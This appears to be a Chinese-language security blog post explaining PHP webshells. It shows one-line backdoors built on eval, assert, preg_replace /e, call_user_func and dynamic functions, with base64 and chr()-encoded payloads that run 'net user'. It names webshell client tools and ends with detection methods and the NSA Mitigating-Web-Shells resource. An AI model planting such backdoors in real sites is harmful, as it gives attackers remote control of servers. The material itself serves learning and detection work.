<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="横贯八方," />




  


  <link rel="alternate" href="/atom.xml" title="故园遗剑" type="application/atom+xml" />






<meta property="og:type" content="article">
<meta property="og:title" content="Webshell">
<meta property="og:url" content="http://yoursite.com/2020/12/27/Webshell/index.html">
<meta property="og:site_name" content="故园遗剑">
<meta property="og:image" content="http://yoursite.com/2020/12/27/Webshell/image-20201228000716100.png">
<meta property="og:image" content="http://yoursite.com/2020/12/27/Webshell/image-20201227230933926.png">
<meta property="og:image" content="http://yoursite.com/2020/12/27/Webshell/image-20201227231016159.png">
<meta property="og:image" content="http://yoursite.com/2020/12/27/Webshell/image-20201227231346947.png">
<meta property="og:image" content="http://yoursite.com/2020/12/27/Webshell/image-20201227231438954.png">
<meta property="og:image" content="http://yoursite.com/2020/12/27/Webshell/image-20201227231521547.png">
<meta property="og:image" content="http://yoursite.com/2020/12/27/Webshell/image-20201227231651751.png">
<meta property="og:image" content="http://yoursite.com/2020/12/27/Webshell/image-20201227231730163.png">
<meta property="og:image" content="http://yoursite.com/2020/12/27/Webshell/image-20201227232549639.png">
<meta property="og:image" content="http://yoursite.com/2020/12/27/Webshell/image-20201227234744591.png">
<meta property="article:published_time" content="2020-12-27T14:56:19.000Z">
<meta property="article:modified_time" content="2021-05-13T15:58:54.787Z">
<meta property="article:author" content="mys3t">
<meta property="article:tag" content="横贯八方">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2020/12/27/Webshell/image-20201228000716100.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/12/27/Webshell/"/>





  <title>Webshell | 故园遗剑</title>
  








<meta name="generator" content="Hexo 4.2.1"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">故园遗剑</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-横贯八方" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/12/27/Webshell/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="mys3t">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="故园遗剑">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Webshell</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-12-27T22:56:19+08:00">
                2020-12-27
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%A8%AA%E8%B4%AF%E5%85%AB%E6%96%B9/" itemprop="url" rel="index">
                    <span itemprop="name">横贯八方</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <hr>
<a id="more"></a>
<p><img src="/2020/12/27/Webshell/image-20201228000716100.png" alt="image-20201228000716100"></p>
<h1 id="什么是Webshell"><a href="#什么是Webshell" class="headerlink" title="什么是Webshell"></a>什么是Webshell</h1><p><strong>百度定义：</strong></p>
<p>webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起，然后就可以使用浏览器来访问asp或者php后门，得到一个命令执行环境，以达到控制网站服务器的目的。<br>顾名思义，“web”的含义是显然需要服务器开放web服务，“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现，也有人称之为网站的后门工具。</p>
<p>常见的webshell编写语言为asp、jsp和php。</p>
<h1 id="webshell的作用"><a href="#webshell的作用" class="headerlink" title="webshell的作用"></a>webshell的作用</h1><h2 id="持久化访问"><a href="#持久化访问" class="headerlink" title="持久化访问"></a>持久化访问</h2><p>Webshell脚本通常会包含后门，黑客上传Webshell之后，就可以充分利用Webshell的后门实现远程访问并控制服务器，从而达到长期控制网站服务器的目的。</p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>在服务器没有配置错误的情况下，Webshell将在web服务器的用户权限下运行，而用户权限是有限的。通过Webshell，黑客可以利用系统上的本地漏洞来实现权限提升，从而获得Root权限，这样黑客基本上可以在系统上做任何事情，包括安装软件、更改权限、添加和删除用户、窃取密码、阅读电子邮件等等。</p>
<h1 id="Webshell常用的PHP函数"><a href="#Webshell常用的PHP函数" class="headerlink" title="Webshell常用的PHP函数"></a>Webshell常用的PHP函数</h1><p>Webshell几乎适用于所有Web编程语言。之所以关注PHP，是因为它是web上使用最广泛的编程语言。下面是PHP中一些执行shell命令最常用的函数。</p>
<h2 id="OS命令执行函数"><a href="#OS命令执行函数" class="headerlink" title="OS命令执行函数"></a>OS命令执行函数</h2><h4 id="system"><a href="#system" class="headerlink" title="system()"></a>system()</h4><p>system()函数将命令作为参数，并输出结果。</p>
<p>如在Windows操作系统上运行dir命令：</p>
<p><img src="/2020/12/27/Webshell/image-20201227230933926.png" alt="image-20201227230933926"></p>
<p>在Linux机器上执行ls命令：</p>
<p><img src="/2020/12/27/Webshell/image-20201227231016159.png" alt="image-20201227231016159"></p>
<h4 id="exec"><a href="#exec" class="headerlink" title="exec()"></a>exec()</h4><p>exec() 函数能将字符串作为OS 命令执行。</p>
<p><img src="/2020/12/27/Webshell/image-20201227231346947.png" alt="image-20201227231346947"></p>
<h4 id="shell-exec"><a href="#shell-exec" class="headerlink" title="shell_exec()"></a>shell_exec()</h4><p>将函数中的参数当做OS 命令执行。</p>
<p><img src="/2020/12/27/Webshell/image-20201227231438954.png" alt="image-20201227231438954"></p>
<h4 id="passthru"><a href="#passthru" class="headerlink" title="passthru()"></a>passthru()</h4><p>将字符串当做系统命令执行。</p>
<p><img src="/2020/12/27/Webshell/image-20201227231521547.png" alt="image-20201227231521547"></p>
<h4 id="popen"><a href="#popen" class="headerlink" title="popen()"></a>popen()</h4><p>popen() 能够执行OS 命令。此函数没有回显，但是可以执行命令。</p>
<p><img src="/2020/12/27/Webshell/image-20201227231651751.png" alt="image-20201227231651751"></p>
<h4 id="反引号"><a href="#反引号" class="headerlink" title="反引号"></a>反引号</h4><p>反引号<code></code> 内的字符串，也会被解析成OS 命令。</p>
<p><img src="/2020/12/27/Webshell/image-20201227231730163.png" alt="image-20201227231730163"></p>
<h2 id="代码执行函数"><a href="#代码执行函数" class="headerlink" title="代码执行函数"></a>代码执行函数</h2><h4 id="eval"><a href="#eval" class="headerlink" title="eval()"></a>eval()</h4><p>eval() 会将符合PHP 语法规范字符串当作php 代码执行。</p>
<p>虽然可以以函数的方式调用eval()，但是eval() 不是PHP 的函数，而是一种语法结构。在eval() 执行的的字符串要以分号结束。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">&#x2F;&#x2F;phpinfo();</span><br><span class="line">&#x2F;&#x2F;$str &#x3D; &quot;phpinfo();&quot;;</span><br><span class="line">&#x2F;&#x2F;echo $str;</span><br><span class="line">$str &#x3D; $_GET[&#39;code&#39;];</span><br><span class="line">eval($str);</span><br><span class="line">&#x2F;&#x2F;      ?code&#x3D;phinfo();</span><br><span class="line">&#x2F;&#x2F;      ?code&#x3D;print(md5(123456));</span><br><span class="line">&#x2F;&#x2F;      ?code&#x3D;system(whoami);</span><br><span class="line">&#x2F;&#x2F;      ?code&#x3D;system(&#39;net user&#39;);</span><br><span class="line">&#x2F;&#x2F;</span><br><span class="line">?&gt;</span><br><span class="line">$str &#x3D; addslashes($_GET[&#39;code&#39;]);</span><br><span class="line">echo $str;</span><br><span class="line">eval($str);</span><br><span class="line">&#x2F;*</span><br><span class="line">编码</span><br><span class="line">1. ascii 编码</span><br><span class="line">?code&#x3D;eval(chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(39).chr(110).chr(101).chr(116).chr(32).chr(117).chr(115).chr(101).chr(114).chr(39).chr(41).chr(59));</span><br><span class="line">​</span><br><span class="line">2. base64 编码</span><br><span class="line">c3lzdGVtKCduZXQgdXNlcicpOw&#x3D;&#x3D;</span><br><span class="line">?code&#x3D;eval(base64_decode(c3lzdGVtKCduZXQgdXNlcicpOw));</span><br><span class="line">*&#x2F;</span><br></pre></td></tr></table></figure>
<h4 id="assert"><a href="#assert" class="headerlink" title="assert()"></a>assert()</h4><p>assert() 同样会将字符串当做PHP 代码来执行。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if(isset($_GET[&#39;code&#39;]))&#123;</span><br><span class="line">    $code&#x3D;$_GET[&#39;code&#39;];</span><br><span class="line">    assert($code);</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    echo &quot;Please submit code!&lt;br &#x2F;&gt;?code&#x3D;phpinfo()&quot;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<h4 id="preg-replace"><a href="#preg-replace" class="headerlink" title="preg_replace()"></a>preg_replace()</h4><p>preg_replace() 函数的作用是对字符串进行正则匹配后替换。</p>
<p>参数和返回值如下:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">preg_replace($pattern,$replacement,$subject);</span><br><span class="line">preg_replace(&#39;&#x2F;a&#x2F;&#39;,&#39;A&#39;,&#39;abacad&#39;);						&#x2F;&#x2F;AbAcAd</span><br><span class="line">preg_replace(&#39;&#x2F;\[(.*)\]&#x2F;&#39;,&#39;A&#39;,&#39;[phpinfo()]&#39;);			&#x2F;&#x2F;A</span><br><span class="line">echo preg_replace(&#39;&#x2F;\[(.*)\]&#x2F;&#39;,&#39;\\1&#39;,&#39;[phpinfo()]&#39;);	&#x2F;&#x2F;phpinfo()</span><br><span class="line">&#x2F;&#x2F;	\\1:代表正则表达式第一次匹配的内容</span><br></pre></td></tr></table></figure>
<p>搜索$subject 中匹配$pattern 的部分，以$replacement 进行替换。</p>
<p>当$pattern 处，存在e 修饰符时，$replacement 的值会被当成PHP 代码来执行。</p>
<p>执行的代码中的参数会被转义。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if(isset($_GET[&#39;code&#39;]))&#123;</span><br><span class="line">    $code&#x3D;$_GET[&#39;code&#39;];</span><br><span class="line">    preg_replace(&quot;&#x2F;\[(.*)\]&#x2F;e&quot;,&#39;\\1&#39;, $code);</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    echo&quot;?code&#x3D;[phpinfo()]&quot;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<h4 id="call-user-func"><a href="#call-user-func" class="headerlink" title="call_user_func()"></a>call_user_func()</h4><p>call_user_func() 等函数都有调用其他函数的功能，回调函数。</p>
<p><img src="/2020/12/27/Webshell/image-20201227232549639.png" alt="image-20201227232549639"></p>
<p>$funName 被调用的函数名。</p>
<p>$para 作为被调用函数的参数，参数中的单引号没有被转义。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if(isset($_GET[&#39;fun&#39;]))&#123;</span><br><span class="line">    $fun&#x3D;$_GET[&#39;fun&#39;];</span><br><span class="line">    $para&#x3D;$_GET[&#39;para&#39;];</span><br><span class="line">    call_user_func($fun,$para);</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    echo&quot;?fun&#x3D;assert&amp;para&#x3D;phpinfo()&quot;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<h4 id="动态函数-a-b"><a href="#动态函数-a-b" class="headerlink" title="动态函数$a($b)"></a>动态函数$a($b)</h4><p>由于PHP 的特性原因，PHP 的函数支持直接由拼接的方式调用，这直接导致了PHP 在安全上的控制有加大了难度。不少知名程序中也用到了动态函数的写法，这种写法跟使用call_user_func()的初衷一样，用来更加方便地调用函数，但是一旦过了不严格就会造成代码执行漏洞。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if(isset($_GET[&#39;a&#39;]))&#123;</span><br><span class="line">    $a&#x3D;$_GET[&#39;a&#39;];</span><br><span class="line">    $b&#x3D;$_GET[&#39;b&#39;];</span><br><span class="line">    $a($b);</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    echo &quot;</span><br><span class="line">    ?a&#x3D;assert&amp;b&#x3D;phpinfo()</span><br><span class="line">    &quot;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<h1 id="Webshell免杀"><a href="#Webshell免杀" class="headerlink" title="Webshell免杀"></a>Webshell免杀</h1><h1 id="Webshell客户端"><a href="#Webshell客户端" class="headerlink" title="Webshell客户端"></a>Webshell客户端</h1><h2 id="客户端与服务端"><a href="#客户端与服务端" class="headerlink" title="客户端与服务端"></a>客户端与服务端</h2><p>提供服务的就是服务端，要求被服务的就是客户端。如果已经种了后门，用于连接后门的程序是要求被服务的，比如执行个ps，目的是为了得到后门所在主机的进程列表，是被服务的，所以称之为客户端。</p>
<p>WebShell客户端是一种用于与服务器上WebShell后门之间进行通信的程序。如今国内外常用的WebShell客户端有如下几种：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">中国菜刀(使用量最大,适用范围最广的WebShell客户端)</span><br><span class="line"></span><br><span class="line">蚁剑(一种常用的WebShell客户端)</span><br><span class="line"></span><br><span class="line">冰蝎(流量加密客户端)</span><br><span class="line"></span><br><span class="line">Cknife(C刀,使用Java语言编写)</span><br><span class="line"></span><br><span class="line">哥斯拉(基于流量、HTTP全加密的webshell管理工具)</span><br><span class="line"></span><br><span class="line">Weevely(kali中的中国菜刀)</span><br></pre></td></tr></table></figure>
<h1 id="Webshell检测"><a href="#Webshell检测" class="headerlink" title="Webshell检测"></a>Webshell检测</h1><h2 id="应急响应检测"><a href="#应急响应检测" class="headerlink" title="应急响应检测"></a>应急响应检测</h2><p>即使是一款拥有99.9%的Webshell检出率的检测引擎，依然可能存在Webshell绕过的情况。另外，像暗链、网页劫持、页面跳转等常见的黑帽SEO手法，也很难通过手动检测或工具检测全部识别出来。</p>
<h4 id="文件MD5校验"><a href="#文件MD5校验" class="headerlink" title="文件MD5校验"></a>文件MD5校验</h4><p>当用户下载软件时，可以使用相同的校验算法计算下载到exe文件的特征值，并与软件开发者发布的特征值比较。如果两个特征值相同，则认为下载到的exe文件是正确的。如果两个特征值不同，则认为下载到exe文件是被篡改过的。</p>
<p>那同理可得，我们可以将所有网站文件计算一次hash值保存，当出现应急情况时，重新计算一次hash值，并与上次保存的hash值进行对比，从而输出新创建的、修改过及删除的文件列表。</p>
<h4 id="diff命令"><a href="#diff命令" class="headerlink" title="diff命令"></a>diff命令</h4><p>在linux中，我们经常使用diff来比较两个文本文件的差异。同样，我们可以通过一行命令快速找出两个项目文件的差异。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">diff -c -a -r cms1 cms2  &#x2F;&#x2F;想查看两个文件是否不同又不想显示差异之处，加上－q选项。</span><br></pre></td></tr></table></figure>
<h4 id="版本控制工具"><a href="#版本控制工具" class="headerlink" title="版本控制工具"></a>版本控制工具</h4><p>版本控制工具，比如说git，重新上传代码到git，add+commit+push，然后打开项目，点击commits，在历史提交版本里面，查看文件更改内容，很容易就可以发现代码被篡改的地方了。</p>
<h4 id="文件对比工具"><a href="#文件对比工具" class="headerlink" title="文件对比工具"></a>文件对比工具</h4><p>Beyond Compare是一套由Scooter Software推出的文件比较工具。主要用途是对比两个文件夹或者文件，并将差异以颜色标示，比较范围包括目录，文档内容等。</p>
<p>下载地址：<a href="http://www.scootersoftware.com/download.php" target="_blank" rel="noopener">http://www.scootersoftware.com/download.php</a></p>
<p>WinMerge是一款运行于Windows系统下的文件比较和合并工具，使用它可以非常方便地比较文件夹和文件，以易于理解的可视文本格式显示差异。</p>
<p>下载地址：<a href="https://winmerge.org/downloads/" target="_blank" rel="noopener">https://winmerge.org/downloads/</a></p>
<h2 id="NSA检测"><a href="#NSA检测" class="headerlink" title="NSA检测"></a>NSA检测</h2><p>美国国家安全局（NSA）和澳大利亚信号局（ASD）联合发布了一份有关缓解WebShell后门的网络安全信息表（CSI）。</p>
<p>NSA发布在Github的检测工具和脚本:</p>
<p><a href="https://github.com/nsacyber/Mitigating-Web-Shells" target="_blank" rel="noopener">https://github.com/nsacyber/Mitigating-Web-Shells</a></p>
<p>检测规则涉及文件层的Yara，网络层的Snort规则，日志类的Splunk，目录检测文件比对等等，加入库中，直接拥有了美国NSA级别的检测能力。</p>
<p><img src="/2020/12/27/Webshell/image-20201227234744591.png" alt="image-20201227234744591"></p>
<p>NSA发布在Github的检测工具和脚本:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">1、由于Webshell经常伪装成图片进行上传，因此可以将这些伪装的图片和知名的图片进行比较。</span><br><span class="line"></span><br><span class="line">2、Splunk查询，用于检测Web流量中的异常URL</span><br><span class="line"></span><br><span class="line">3、Internet信息服务（IIS）日志分析工具</span><br><span class="line"></span><br><span class="line">4、常见Web Shell的网络流量签名</span><br><span class="line"></span><br><span class="line">5、识别异常网络流量的说明</span><br><span class="line"></span><br><span class="line">6、识别Sysmon数据中关于Webshell相关的异常流程调用</span><br><span class="line"></span><br><span class="line">7、使用Audited识别异常流程调用的说明</span><br><span class="line"></span><br><span class="line">8、用于阻止对可通过Web访问的目录的更改的HIPS规则</span><br></pre></td></tr></table></figure>
<p>从Github介绍可知，很是全面。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/%E6%A8%AA%E8%B4%AF%E5%85%AB%E6%96%B9/" rel="tag"># 横贯八方</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/12/24/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2/" rel="next" title="内网安全攻防">
                <i class="fa fa-chevron-left"></i> 内网安全攻防
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/01/03/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/" rel="prev" title="Shiro反序列化漏洞利用">
                Shiro反序列化漏洞利用 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">mys3t</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">81</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">19</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">29</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#什么是Webshell"><span class="nav-number">1.</span> <span class="nav-text">什么是Webshell</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#webshell的作用"><span class="nav-number">2.</span> <span class="nav-text">webshell的作用</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#持久化访问"><span class="nav-number">2.1.</span> <span class="nav-text">持久化访问</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#提权"><span class="nav-number">2.2.</span> <span class="nav-text">提权</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Webshell常用的PHP函数"><span class="nav-number">3.</span> <span class="nav-text">Webshell常用的PHP函数</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#OS命令执行函数"><span class="nav-number">3.1.</span> <span class="nav-text">OS命令执行函数</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#system"><span class="nav-number">3.1.0.1.</span> <span class="nav-text">system()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#exec"><span class="nav-number">3.1.0.2.</span> <span class="nav-text">exec()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#shell-exec"><span class="nav-number">3.1.0.3.</span> <span class="nav-text">shell_exec()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#passthru"><span class="nav-number">3.1.0.4.</span> <span class="nav-text">passthru()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#popen"><span class="nav-number">3.1.0.5.</span> <span class="nav-text">popen()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#反引号"><span class="nav-number">3.1.0.6.</span> <span class="nav-text">反引号</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#代码执行函数"><span class="nav-number">3.2.</span> <span class="nav-text">代码执行函数</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#eval"><span class="nav-number">3.2.0.1.</span> <span class="nav-text">eval()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#assert"><span class="nav-number">3.2.0.2.</span> <span class="nav-text">assert()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#preg-replace"><span class="nav-number">3.2.0.3.</span> <span class="nav-text">preg_replace()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#call-user-func"><span class="nav-number">3.2.0.4.</span> <span class="nav-text">call_user_func()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#动态函数-a-b"><span class="nav-number">3.2.0.5.</span> <span 